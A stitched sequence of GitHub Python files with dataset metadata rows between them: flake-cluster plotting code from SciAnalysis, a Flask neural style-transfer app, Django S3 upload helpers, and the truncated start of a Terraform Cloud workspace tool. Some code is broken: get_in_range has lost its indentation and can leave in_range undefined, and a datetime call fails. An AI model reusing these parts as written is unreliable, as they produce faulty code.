        self.plot_cluster(output_dir, '{:03d}'.format(i), feature_vector, feature_vector_orig, flakes_cluster, features_cluster, distributions, dist_bin_edges, rescale=rescale, plot_buffers=plot_buffers, **run_args)
def plot_cluster(self, output_dir, cluster_name, feature_vector, feature_vector_orig, flakes_cluster, features_cluster, distributions, dist_bin_edges, rescale=None, plot_buffers=[0.01,0.0,0.0,0.045], **run_args):
    ''' Outputs an image showing representative flakes for this cluster.
    flakes_cluster, features_cluster : The subset of flakes (and their features) for this cluster.
    feature_vector, feature_vector_orig : The centroid of this cluster (average of features).
    distributions, dist_bin_edges : The feature distributions (for all flakes).
    When run_args['output_all'] is truthy, additional pages showing every
    flake of the cluster are also written.
    '''
    num_flakes = len(flakes_cluster)
    # Sort flakes by their distance from the cluster centroid (which is located at position "feature_vector")
    distances = cdist(features_cluster, [feature_vector], metric='euclidean')[:,0]
    sort_indices = np.argsort(distances)
    flakes_cluster = flakes_cluster[sort_indices]
    features_cluster = features_cluster[sort_indices]
    distances = distances[sort_indices]
    if run_args['verbosity']>=5:
        print(' image for cluster {} ({:,d} flakes)'.format(cluster_name, num_flakes))
    # Output a summary (central, generic, peripheral)
    ########################################
    self.fig = plt.figure( figsize=(8,8), facecolor='white' )
    fea_w, fea_h = 0.04, 0.95 # Size of features graphs in sidebar
    plt.figtext(0,1, 'cluster {} ({:,d} flakes)'.format(cluster_name, num_flakes), size=20, verticalalignment='top', horizontalalignment='left')
    # Sidebar that shows the feature vector for the centroid of this cluster
    self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
    # Images of example flakes for this cluster
    self._plot_cluster_main(flakes_cluster, distances, fea_w=fea_w, fea_h=fea_h, plot_buffers=plot_buffers, **run_args)
    outfile = os.path.join(output_dir, 'cluster-{}-{}.png'.format(run_args['cluster_method'], cluster_name))
    plt.savefig(outfile, dpi=300)
    plt.close(self.fig.number)
    if 'output_all' in run_args and run_args['output_all']:
        # Output every flake of the cluster, paginated
        ########################################
        nrows, ncols = 8, 7
        num_per_page = nrows*ncols
        num_pages = int(np.ceil(num_flakes/num_per_page))
        for page in range(num_pages):
            num_this_page = num_per_page
            if page==(num_pages-1): # Last page
                num_this_page = num_flakes - (num_pages-1)*num_per_page
            idx_start = page*num_per_page
            idx_end = idx_start+num_this_page
            if run_args['verbosity']>=5:
                print(' page {:d} for cluster {} ({:,d}/{:,d} flakes)'.format(page+1, cluster_name, num_this_page, num_flakes))
            self.fig = plt.figure( figsize=(8,8), facecolor='white' )
            plt.figtext(0,1, 'cluster {} ({:,d}/{:,d} flakes)'.format(cluster_name, num_this_page, num_flakes), size=20, verticalalignment='top', horizontalalignment='left')
            # Sidebar that shows the feature vector for the centroid of this cluster
            if rescale is not None:
                # Since we have access to the scaling between original coordinates for feature vector
                # and the rescale coordinates (avg=0, std=1), we can compute the sidebar for just the
                # flakes being displayed.
                # There are two equivalent ways to get the information for this subset of flakes (this page of results)
                # Method 1: Load features_orig for these flakes, and transform them
                #flakes_page = flakes_cluster[idx_start:idx_end]
                #features_orig = self.load_features(flakes_page, **run_args)
                #features_rescaled = rescale.transform(features_orig)
                # Method 2: Select subset of rescaled features, and inverse_transform them
                features_rescaled = features_cluster[idx_start:idx_end]
                features_orig = rescale.inverse_transform(features_rescaled)
                # Compute centroid for this subset of flakes (this page of results)
                feature_vector_orig = np.average(features_orig, axis=0)
                feature_vector = rescale.transform( [feature_vector_orig] )[0]
                self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_rescaled, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
            else:
                self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
            self._plot_cluster_page(idx_start, flakes_cluster, distances, fea_w, fea_h, plot_buffers, nrows, ncols, **run_args)
            outfile = os.path.join(output_dir, 'cluster-{}-page{:03d}.png'.format(run_args['cluster_method'], page+1))
            plt.savefig(outfile, dpi=300)
            plt.close(self.fig.number)
def _plot_cluster_page(self, idx, flakes_cluster, distances, fea_w, fea_h, plot_buffers, nrows, ncols, **run_args):
    """Lay out a full nrows x ncols grid of flake images starting at index
    *idx* (used for the paginated 'output_all' sheets)."""
    # The total area we have available for plotting flakes
    left_buf, right_buf, bottom_buf, top_buf = plot_buffers
    left_buf += fea_w*( 2.2 + 2.3 )  # leave room for the feature sidebar
    fig_width = 1.0-right_buf-left_buf
    fig_height = 1.0-top_buf-bottom_buf
    w = fig_width/ncols
    ystart = bottom_buf+fig_height
    for irow in range(nrows):
        for icol in range(ncols):
            ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
            if idx<len(flakes_cluster):
                self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
            idx += 1
def _plot_cluster_main(self, flakes_cluster, distances, fea_w, fea_h, plot_buffers, **run_args):
    """Lay out the summary sheet for one cluster: grids of 'central' flakes
    (closest to centroid), 'generic' flakes (mid-distance), and 'peripheral'
    flakes (farthest). Assumes flakes_cluster is sorted by distance."""
    # The total area we have available for plotting flakes
    left_buf, right_buf, bottom_buf, top_buf = plot_buffers
    left_buf += fea_w*( 2.2 + 2.3 )  # leave room for the feature sidebar
    fig_width = 1.0-right_buf-left_buf
    fig_height = 1.0-top_buf-bottom_buf
    #self.ax = self.fig.add_axes( [left_buf, bottom_buf, fig_width, fig_height] )
    # Central flakes
    nrows, ncols = 3, 7
    w = fig_width/ncols
    idx = 0
    ystart = bottom_buf+fig_height
    plt.figtext(left_buf, ystart, 'central', size=8, verticalalignment='bottom', horizontalalignment='left')
    for irow in range(nrows):
        for icol in range(ncols):
            ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
            if idx<len(flakes_cluster):
                self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
            idx += 1
    # Generic flakes
    if idx<len(flakes_cluster):
        ystart = ystart-nrows*w - 0.015
        #nrows, ncols = 2, 6
        w = fig_width/ncols
        # Jump to the middle of the distance-sorted list (but never backwards)
        idx = max( int( np.clip( len(flakes_cluster)/2, idx, len(flakes_cluster)-nrows*ncols ) ), idx )
        plt.figtext(left_buf, ystart, 'generic', size=8, verticalalignment='bottom', horizontalalignment='left')
        for irow in range(nrows):
            for icol in range(ncols):
                ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
                if idx<len(flakes_cluster):
                    self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
                idx += 1
    # Peripheral flakes
    if idx<len(flakes_cluster):
        ystart = ystart-nrows*w - 0.015
        nrows, ncols = 2, 7
        w = fig_width/ncols
        # Jump to the tail of the distance-sorted list (but never backwards)
        idx = max( len(flakes_cluster)-nrows*ncols, idx )
        plt.figtext(left_buf, ystart, 'peripheral', size=8, verticalalignment='bottom', horizontalalignment='left')
        for irow in range(nrows):
            for icol in range(ncols):
                ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
                if idx<len(flakes_cluster):
                    self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
                idx += 1
def _plot_cluster_sidebar(self, feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w, fea_h, **run_args):
    """Draw the left sidebar: a heat-strip of the cluster's (normed) centroid
    feature vector, annotated with values and, for fewer than 80 features,
    per-feature mini-histograms (global distribution in blue, this cluster's
    in purple, with the centroid value marked by a vertical line)."""
    # Sidebar that shows the feature vector for the centroid of this cluster
    vmin, vmax = run_args['feature_normed_range']
    self.ax = self.fig.add_axes( [0.0, 0, fea_w, fea_h] )
    vector = np.asarray([feature_vector]).transpose()
    self.ax.imshow(vector, cmap='inferno', aspect='auto', vmin=vmin, vmax=vmax)
    self.ax.set_xticklabels([])
    self.ax.set_yticklabels([])
    xi, xf, yi, yf = self.ax.axis()
    if len(feature_vector)<80:
        for ifea, fea in enumerate(feature_vector):
            # White text on dark (negative) cells, black on bright cells
            if fea<0:
                color = 'white'
            else:
                color = 'k'
            self.ax.text((xi+xf)*0.5, ifea, '{:.2f}'.format(fea), color=color, size=8, verticalalignment='center', horizontalalignment='center')
            self.ax.text(xf, ifea, '{:.3g}'.format(feature_vector_orig[ifea]), size=6, verticalalignment='center', horizontalalignment='left')
            # Miniature histogram (of the entire distribution)
            axc = self.fig.add_axes( [fea_w*2.2, fea_h-(ifea+1)*fea_h/len(feature_vector), fea_w*2.3, fea_h/len(feature_vector)] )
            w = dist_bin_edges[ifea][1]-dist_bin_edges[ifea][0]
            axc.bar( dist_bin_edges[ifea][:-1]+0.5*w, distributions[ifea], width=w, color='b', alpha=0.3 )
            plt.xlim(vmin,vmax)
            # Overlay the histogram for this cluster
            distribution, dist_bin_edge = np.histogram(features_cluster[:,ifea], bins=50, range=[vmin,vmax], density=True)
            distribution *= np.max(distributions[ifea])/np.max(distribution)
            #axc.bar( dist_bin_edge[:-1]+0.5*w, distribution, width=w, color='purple', alpha=0.2 )
            axc.plot( dist_bin_edge[:-1]+0.5*w, distribution, '-', color='purple', linewidth=0.8, alpha=0.3 )
            axc.axvline(fea, color='purple', linewidth=1)
            # Thick edge marker when the centroid value is off-scale
            if fea<vmin:
                axc.axvline(vmin, color='purple', linewidth=4)
            elif fea>vmax:
                axc.axvline(vmax, color='purple', linewidth=4)
            axc.axes.get_xaxis().set_visible(False)
            axc.axes.get_yaxis().set_visible(False)
            if len(self.feature_names)==len(feature_vector):
                axc.text(vmin, np.max(distributions[ifea]), self.feature_names[ifea], size=4, verticalalignment='top', horizontalalignment='left', alpha=0.25)
            axc.text(vmax, np.max(distributions[ifea]), '{:d}'.format(ifea), size=4, verticalalignment='top', horizontalalignment='right', alpha=0.25)
def _plot_flake_image(self, ax_pos, flake_i, distance, **run_args):
    """Render one flake into axes at *ax_pos*: a contrast-adjusted crop of
    its parent image plus annotations (source/position, size, centroid
    distance, contrast) and optional overlays selected by run_args['overlays'].
    """
    # Load parent image
    filename = flake_i['infile'].replace('\\', '/') # String replace in case files were saved on another platform.
    img = plt.imread(filename)
    h, w, c = img.shape
    # Define image sub-region that has the flake in it
    y1, y2, x1, x2 = flake_i['bbox']
    # Make the crop border a bit bigger than the flake bounding box
    box_size = (1+run_args['bbox_pad'])*max( abs(x2-x1), abs(y2-y1) )
    # Square crop centered on the bbox center, clipped to image bounds
    x1p = int(np.clip((x1+x2)*0.5 - box_size/2, 0, w))
    x2p = int(np.clip((x1+x2)*0.5 + box_size/2, 0, w))
    y1p = int(np.clip((y1+y2)*0.5 - box_size/2, 0, h))
    y2p = int(np.clip((y1+y2)*0.5 + box_size/2, 0, h))
    box = y1p, y2p, x1p, x2p
    # Adjust image of flake
    flake = img[y1p:y2p , x1p:x2p, :]
    # Contrast window is computed from the WHOLE image so crops are comparable
    in_range = self.get_in_range(img, run_args['image_contrast'], **run_args)
    flake = skimage.exposure.rescale_intensity(flake, in_range=in_range, out_range='dtype')
    # Plot flake
    self.ax = self.fig.add_axes(ax_pos)
    self.ax.axes.get_xaxis().set_visible(False)
    self.ax.axes.get_yaxis().set_visible(False)
    self.ax.imshow(flake)
    xi, xf, yi, yf = self.ax.axis()
    yc, xc = flake_i['center_of_mass']
    s = '{}\nflake{:03d}\n({}, {})'.format(flake_i['infile'], flake_i['index'], int(xc), int(yc))
    self.ax.text(xi, yf, s, color='white', size=3, verticalalignment='top', horizontalalignment='left')
    self.ax.text(xi, yi, '${:.1f} \, \mathrm{{\mu m}}$'.format(flake_i['radius_um']), color='r', size=5, verticalalignment='bottom', horizontalalignment='left')
    self.ax.text((xi+xf)*0.5, yi, '{:.1f}'.format(distance), color='white', size=2, verticalalignment='bottom', horizontalalignment='center')
    self.ax.text(xf, yi, '{:.3f}'.format(flake_i['flake_contrast']), color='orange', size=3, verticalalignment='bottom', horizontalalignment='right')
    # Various overlays on the flake
    # Convert center-of-mass to crop-local coordinates
    xc -= x1p
    yc -= y1p
    size = flake_i['radius_pixels']
    if run_args['overlays']>=1:
        c = flake_i['contour']
        xs = (c[:,0] - x1p)
        ys = (c[:,1] - y1p)
        self.ax.plot(xs, ys, '-', linewidth=0.6, color='r', dashes=[4,1], alpha=0.2)
    if run_args['overlays']>=7:
        c = flake_i['convex_hull']
        xs = (c[:,1] - x1p)
        ys = (c[:,0] - y1p)
        self.ax.plot(xs, ys, '-', linewidth=0.5, color='g', alpha=0.5)
    if run_args['overlays']>=5:
        rect = patches.Rectangle( ((x1-x1p), (y1-y1p)), (x2-x1), (y2-y1), linewidth=1.0, edgecolor='orange', facecolor='none', alpha=0.5)
        self.ax.add_patch(rect)
    if run_args['overlays']>=3:
        # Cross hair and circle
        rect = patches.Rectangle( (xc-size/2, yc), size, 0, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3) # Horizontal bar
        self.ax.add_patch(rect)
        rect = patches.Rectangle( (xc, yc-size/2), 0, size, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3) # Vertical bar
        self.ax.add_patch(rect)
    if run_args['overlays']>=5:
        # Circle overlay denoting size
        circ = patches.Circle(xy=(xc,yc), radius=size, linewidth=0.6, edgecolor='r', facecolor='none', alpha=0.3)
        self.ax.add_patch(circ)
def get_in_range(self, data, im_contrast, image_contrast_trim=None, **run_args):
if image_contrast_trim is not None:
image_contrast_trim = np.clip(image_contrast_trim, 0, 0.95)
avg = np.average(data)
avg /= 255
amt = image_contrast_trim
im_contrast = ( avg*amt , 1.0-(1.0-avg)*amt )
in_range = ( im_contrast[0]*255, im_contrast[1]*255 )
return in_range
class select_flakes(cluster):
    """Protocol that selects flakes whose features fall inside user-given ranges.

    Unlike the clustering protocols, this simply filters the flake list by
    run_args['selection'] and reuses the cluster-plotting machinery to
    visualize the selected subset.
    """
    def __init__(self, name='select_flakes', **kwargs):
        self.name = self.__class__.__name__ if name is None else name
        self.default_ext = '.pkl'
        # Default run arguments; user kwargs override these below.
        self.run_args = {
            'file_extension' : '.pkl',
            'force' : False,
            'verbosity' : 3,
            'num_jobs' : None,
            'num_clusters' : 20,
            'cluster_method' : 'selection',
            'features' : 'all', # 'shape', 'color', 'all'
            'feature_normed_range' : [-2, +2], # range for plotting the normed features
            'bbox_pad' : 0.5,
            'image_contrast' : (0, 1),
            'image_contrast_trim' : None,
            'overlays' : 3,
            }
        self.run_args.update(kwargs)
        # WARNING: This association of features names is hard-coded, and is thus contingent
        # on the current implementation of Protocols.py>flake_analysis
        self.feature_names_color = [
            'g contrast',
            'v contrast',
            'gray',
            'gray std',
            'H',
            'S',
            'V',
            'H std',
            'S std',
            'V std',
            'R',
            'G',
            'B',
            'R std',
            'G std',
            'B std',
            'entropy'
            ]
        # Each color feature also has an "_inner" variant (computed on the flake interior).
        self.feature_names_color = self.feature_names_color + ['{}_inner'.format(f) for f in self.feature_names_color]
        self.feature_names_shape = ['P/A'] + ['hist {}'.format(i) for i in range(15)] + ['fractal dimension']
    @run_default
    def run(self, datas, output_dir, basename, **run_args):
        """Load flakes, select those matching the criteria, and plot the selection."""
        results = {}
        # Load all flakes identified by "find_flakes" protocol
        flakes = self.load_flakes(datas, **run_args)
        if run_args['verbosity']>=4:
            print(' {:,d} flakes identified in {:d} images'.format(len(flakes), len(datas)))
        # Compute the rescaling of feature vectors
        features_all_orig = self.load_features(flakes, **run_args)
        rescale = StandardScaler()
        features_all_rescaled = rescale.fit_transform(features_all_orig)
        # Filter flakes by the user's selection criteria.
        flakes_selected = self.select(flakes, features_all_orig, features_all_rescaled, **run_args)
        features_orig = self.load_features(flakes_selected, **run_args)
        # Average feature vector of the selection, in original and rescaled units.
        feature_vector_orig = np.average(features_orig, axis=0)
        feature_vector = rescale.transform( [feature_vector_orig] )[0]
        features = rescale.transform(features_orig)
        if run_args['verbosity']>=4:
            print(" Selected {:,d} flakes using '{}'".format(len(flakes_selected), run_args['cluster_method']))
        clustering = self.load_clustering(basename=basename, output_dir=output_dir, features_rescaled=features, **run_args)
        self.plot_cluster(output_dir, cluster_name='selection', feature_vector=feature_vector, feature_vector_orig=feature_vector_orig, flakes_cluster=flakes_selected, features_cluster=features, distributions=clustering['distributions'], dist_bin_edges=clustering['dist_bin_edges'], rescale=rescale, **run_args)
        return results
    def extract_features(self, feature_name, flakes, flake_features, **run_args):
        """Return a 1D array of the named feature across all *flakes*.

        Supports derived names: "<f> std __relative" and "<f> std_inner __relative"
        compute the std divided by the feature itself (recursively).
        """
        # Extract the specified feature, returning a list of that feature
        # for the entire list of flakes
        # Handle special case of relative standard deviation
        if feature_name.endswith(' std_inner __relative'):
            if run_args['verbosity']>=5:
                print(" Computing {}".format(feature_name))
            name = feature_name[:-len(' std_inner __relative')]
            features = self.extract_features(name, flakes, flake_features, **run_args)
            features_std = self.extract_features('{} std_inner'.format(name), flakes, flake_features, **run_args)
            return features_std/features
        elif feature_name.endswith(' std __relative'):
            if run_args['verbosity']>=5:
                print(" Computing {}".format(feature_name))
            features = self.extract_features(feature_name[:-len(' std __relative')], flakes, flake_features, **run_args)
            features_std = self.extract_features(feature_name[:-len(' __relative')], flakes, flake_features, **run_args)
            return features_std/features
        # Check if it appears as value associated with each flake object
        if feature_name in flakes[0]:
            if run_args['verbosity']>=5:
                print(" Extracting {} from flakes".format(feature_name))
            return np.asarray( [ f[feature_name] for f in flakes ] )
        # Default: lookup in self.feature_names
        i = self.feature_names.index(feature_name)
        if run_args['verbosity']>=5:
            print(" Extracting {} from flake_features, index {}".format(feature_name, i))
        return flake_features[:,i]
    def select(self, flakes, flake_features_orig, flake_features_rescaled, **run_args):
        """Return the flakes whose features satisfy every (min, max) range in run_args['selection'].

        A key ending in " __rescaled" is compared against the standardized
        feature values; other keys use the original units.
        """
        # Generate a list of boolean arrays, which are selecting flakes with
        # features within the specified range
        conditions = []
        for key, value in run_args['selection'].items():
            if run_args['verbosity']>=5:
                print(" Adding condition: {} between {} and {}".format(key, value[0], value[1]))
            if key.endswith(' __rescaled'):
                features = self.extract_features(key[:-len(' __rescaled')], flakes, flake_features_rescaled, **run_args)
            else:
                features = self.extract_features(key, flakes, flake_features_orig, **run_args)
            conditions.append( (features>=value[0]) )
            conditions.append( (features<=value[1]) )
        # A flake is kept only if it passes every condition.
        idx = np.where(np.all(conditions, axis=0))[0]
        flakes = np.asarray(flakes)[idx]
        if run_args['verbosity']>=3 and len(flakes)<1:
            print("WARNING: Selection criteria too restrictive. (No flakes meet criteria.)")
        return flakes
| CFN-softbio/SciAnalysis | SciAnalysis/ImAnalysis/Flakes/cluster.py | cluster.py | py | 42,216 | python | en | code | 19 | github-code | 36 | [
{
"api_name": "pickle.load",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "joblib.Parallel",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "joblib.delayed",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "itertools.chain.from_itera... |
14198442268 | import os
from flask import Flask, render_template, request
import base64
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import src.components.data_ingestion as DI
from src.components.model_trainer import modelTrain
from werkzeug.utils import secure_filename
app = Flask(__name__)
# Store user uploads under static/uploads, resolved relative to this file.
app.config["UPLOAD_FOLDER"] = os.path.abspath(os.path.join(os.path.dirname(__file__), 'static', 'uploads'))
# Default image directories provided by the data-ingestion component.
content_dir = DI.default_content_dir
style_dir = DI.default_style_dir
@app.route('/')
def index():
    """Render the home page listing the selectable default content and style images.

    Bug fix: the original filter used `endswith('.jpg' or '.png' or '.jpeg')`,
    which evaluates to `endswith('.jpg')` and silently ignored .png/.jpeg
    files; `str.endswith` accepts a tuple of suffixes, matching all three.
    """
    image_exts = ('.jpg', '.png', '.jpeg')
    content_images = [f for f in os.listdir(content_dir) if f.endswith(image_exts)]
    style_images = [f for f in os.listdir(style_dir) if f.endswith(image_exts)]
    return render_template('index.html', content_images=content_images, style_images=style_images)
@app.route('/transfer', methods=['POST'])
def transfer_style():
    """Run neural style transfer with user-selected images and hyperparameters.

    Reads epochs/learning-rate/alpha/beta from the form, resolves the content
    and style image paths depending on the chosen image source (default,
    custom content, custom style, or both custom), trains the model, and
    returns the generated image embedded in the result page as base64 PNG.
    """
    # Retrieve user input from the form
    epochs = int(request.form['epochs'])
    learning_rate = float(request.form['learningRate'])
    alpha = float(request.form['alpha'])
    beta = float(request.form['beta'])
    selected_source = request.form.get("imageSource")
    content_image = request.form.get('contentImage')
    style_image = request.form.get('styleImage')
    # NOTE(review): the four branches below duplicate the upload-saving steps;
    # a small helper would remove the repetition.
    if selected_source == 'default':
        content_image_path = os.path.join(content_dir, content_image)
        style_image_path = os.path.join(style_dir, style_image)
    elif selected_source == 'custom_image':
        # Custom content image, default style image.
        custom_content = request.files.get('customContentImage')
        content_image_filename = secure_filename(custom_content.filename)
        content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
        os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
        print("Content Image Path:", content_image_path)
        custom_content.save(content_image_path)
        style_image_path = os.path.join(style_dir, style_image)
    elif selected_source == 'custom_style':
        # Default content image, custom style image.
        custom_style = request.files.get('customStyleImage')
        style_image_filename = secure_filename(custom_style.filename)
        style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
        print("Style Image Path:", style_image_path)
        os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
        custom_style.save(style_image_path)
        content_image_path = os.path.join(content_dir, content_image)
    elif selected_source == 'custom':
        # Both images uploaded by the user.
        custom_content = request.files.get('customContentImage')
        content_image_filename = secure_filename(custom_content.filename)
        content_image_path = os.path.join(app.config['UPLOAD_FOLDER'], content_image_filename)
        os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
        print("Content Image Path:", content_image_path)
        custom_content.save(content_image_path)
        custom_style = request.files.get('customStyleImage')
        style_image_filename = secure_filename(custom_style.filename)
        style_image_path = os.path.join(app.config['UPLOAD_FOLDER'], style_image_filename)
        print("Style Image Path:", style_image_path)
        os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
        custom_style.save(style_image_path)
    # Perform style transfer
    test = modelTrain(content_image_path, style_image_path)
    generated_image = test.train(epochs=epochs, lr=learning_rate, alpha=alpha, beta=beta)
    # Convert the generated image to base64 and pass it to the template
    buffer = BytesIO()
    plt.imshow(generated_image)
    plt.axis('off')
    plt.savefig(buffer, format='png', bbox_inches='tight', pad_inches=0)
    buffer.seek(0)
    img_str = base64.b64encode(buffer.getvalue()).decode('utf-8')
    return render_template('result.html', img_data=img_str)
if __name__ == "__main__":
    # Run the development server (debug mode; not for production use).
    app.run(debug=True)
| al0nkr/style-transfer-nn | app.py | app.py | py | 3,973 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number"... |
16209163559 | import datetime
import os
import random
import string
from datetime import datetime
import requests
from boto3 import Session
from django.conf import settings
from django.conf.global_settings import MEDIA_ROOT
from market_backend.apps.accounts.models import Media
from market_backend.v0.accounts import serializers
class AccountsUtils:
    """
    Utility methods related to Accounts Application
    """

    @staticmethod
    def get_user_full_name(user):
        """Return a display name for a user, or a ' / '-joined list of names.

        A user with a first or last name is shown as "first last"; otherwise
        the local part of the username (before '@') is used.

        Bug fix: the list branch previously appended the username part even
        when a full name had already been added; it now mirrors the
        single-user branch (name OR username, never both).
        """
        def display_name(u):
            # Prefer the real name; fall back to the username's local part.
            if u.first_name or u.last_name:
                return "{} {}".format(u.first_name, u.last_name)
            return "{}".format(u.username.split('@')[0])

        if isinstance(user, list):
            return ' / '.join(display_name(u) for u in user)
        return display_name(user)

    @staticmethod
    def get_readable_user_type(type):
        """Turn a type code like 'SUPER_USER' into readable 'Super user'."""
        return type.replace('_', ' ').lower().capitalize()
class FileUploadUtils(object):
    """Helpers for uploading, naming, and deleting files stored in S3."""

    @staticmethod
    def getFileKey():
        # Random 50-character alphanumeric S3 object key.
        # NOTE(review): `random` is not cryptographically secure; if these keys
        # must be unguessable, use the `secrets` module instead.
        return ''.join(
            random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(50))

    @staticmethod
    def deleteFile(key):
        """Delete the S3 object behind a Media row and remove the row.

        NOTE(review): the argument is looked up as the Media `id`, not its
        `key` column — confirm callers pass the primary key here.
        """
        media = Media.objects.get(id=key)
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        my_bucket = s3.Bucket(settings.AWS_BUCKET_NAME)
        response = my_bucket.delete_objects(
            Delete={
                'Objects': [
                    {
                        'Key': media.key
                    }
                ]
            }
        )
        media.delete()
        return response

    @staticmethod
    def getFileName(key):
        """Return the stored file name for the given S3 key, or None if not found."""
        try:
            file = Media.objects.get(key=key)
            return file.file_name
        except Exception as e:
            print(e)
            return None

    @staticmethod
    def getContentType(extension, url=None):
        # Map a file extension to a MIME type; unknown extensions default to image/jpeg.
        if extension == 'pdf':
            return 'application/pdf'
        elif extension == 'png':
            return 'image/png'
        elif extension == 'jpeg' or extension == 'jpg':
            return 'image/jpeg'
        else:
            return 'image/jpeg'

    @staticmethod
    def uploadFile(url):
        """Download the file at *url*, push it to S3, and record it as a Media row.

        Returns the created Media object, or None for an invalid file.
        """
        filename = url.split("/")[-1]
        # NOTE(review): split('.')[1] breaks on names with multiple dots;
        # os.path.splitext would be safer.
        fileextension = filename.split('.')[1]
        file = requests.get(url).content
        filepath = os.path.join(MEDIA_ROOT, filename)
        with open(filepath, 'wb') as destination:
            destination.write(file)
        file = open(filepath, 'rb')
        extension = FileUploadUtils.getContentType(fileextension)
        valid_file = True
        if extension is None:
            # NOTE(review): getContentType never returns None, so this guard
            # is currently dead code.
            valid_file = False
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        file_key = FileUploadUtils.getFileKey()
        if valid_file:
            res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType=extension,
                                                                 ACL='public-read')
            data = {'key': file_key, 'file_name': filename, 'is_link': True}
            serializer = serializers.CreateFileUploadSerializer(data=data)
            if serializer.is_valid():
                serializer.save()
            # Remove the temporary local copy once uploaded.
            if os.path.isfile(filepath):
                os.remove(filepath)
            media = Media.objects.get(key=file_key)
            return media
        else:
            return None

    @staticmethod
    def upload_file_by_file(file):
        """Upload an in-memory PDF to S3 under a timestamped name; return the Media row.

        NOTE(review): this module does `from datetime import datetime`, which
        shadows the module, so `datetime.datetime.now()` raises AttributeError —
        likely should be `datetime.now()`. Confirm and fix.
        """
        milli_sec = str(datetime.datetime.now())
        filename = str(milli_sec) + '.pdf'
        print(file)
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        file_key = FileUploadUtils.getFileKey()
        res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType='application/pdf',
                                                             ACL='public-read')
        data = {'key': file_key, 'file_name': filename, 'is_link': False}
        serializer = serializers.CreateFileUploadSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
        media = Media.objects.get(key=file_key)
        return media

    @staticmethod
    def get_url_from_media_object(media):
        # Public URL = bucket base link + object key.
        return settings.AWS_S3_BASE_LINK + media.key
| muthukumar4999/market-backend | market_backend/v0/accounts/utils.py | utils.py | py | 5,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.choice",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "string.ascii_uppercase",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "string.ascii_lowercase",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": ... |
8473901690 | #!/usr/bin/env python3
############
## https://gist.github.com/DevBOFH/7bd65dbcb945cdfce42d21b1b6bc0e1b
############
##
##
description = 'Terraform workspace tool. This tool can be used to perform CRUD operations on Terraform Cloud via their public API.'
version = "0.0.1"
import os
import re
import sys
import requests
import argparse
import json
ORGANIZATION = "TF_CLOUD_ORG_NAME"  # Terraform Cloud organization to operate on (placeholder)
HEADERS = {"Content-Type": "application/vnd.api+json"}  # Authorization entry added by load_api_credentials()
def load_api_credentials(rc_path="~/.terraformrc"):
    """Read the Terraform Cloud API token from *rc_path* and store it in HEADERS."""
    with open(os.path.expanduser(rc_path)) as credentials_file:
        match = re.search(r'token = "([^"]+)"', credentials_file.read())
        if match:
            HEADERS["Authorization"] = f"Bearer {match.group(1)}"
        else:
            raise RuntimeError(f"Unable to load credentials from {rc_path}")
def new_workspace(workspace_name):
    """Create a new Terraform Cloud workspace; print the error and exit(2) on HTTP failure."""
    payload = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
    url = f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces"
    response = requests.post(url, json=payload, headers=HEADERS)
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
def show_workspace(workspace_name):
    """Fetch the named workspace and pretty-print its JSON description.

    NOTE(review): on an HTTP error this exits silently with status 0,
    unlike the other commands which print the error and exit(2) —
    confirm that is intentional.
    """
    req = requests.get(
